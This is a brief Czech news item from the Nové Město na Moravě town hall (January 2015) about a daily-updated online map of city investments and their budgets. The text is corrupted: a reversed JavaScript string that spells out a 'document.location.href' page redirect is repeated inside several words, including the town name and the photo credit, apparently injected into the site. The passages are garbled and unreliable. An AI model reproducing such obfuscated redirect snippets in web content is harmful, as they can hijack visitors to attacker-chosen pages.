mapa
Rainbow page separator

Novoměstská investiční mapa je aktualizována každý den

Sobota, 3. ledna 2015

Radnice Nové Město na Moravě

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Každý den je aktualizována takzvaná investiční mapa města. Lidé z ní získají přehledné informace o investičních akcích či velkých opravách a jejich rozmístění v Novém Městě na Moravě. V mapě je rovněž zobrazena výše schváleného rozpočtu každé akce a po jejím dokončení také skutečné náklady.
„Investiční mapou pokračujeme ve snaze přiblížit dění ve městě veřejnosti. Chceme občanům nudná ekonomická data ukázat příjemnou a jednodušší formou,“ vyjádřil se starosta Nového Města na Moravě Michal Šmarda.
Mapa investic je pro zájemce dostupná prostřednictvím internetu, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na adrese http://rozpocet.nmnm.cz/cz/mapa/, případně se do ní lze dostat přes rozcestník v novoměstském klikacím rozpočtu.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com/“ target=“_blank“>www.dajc-naturepho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com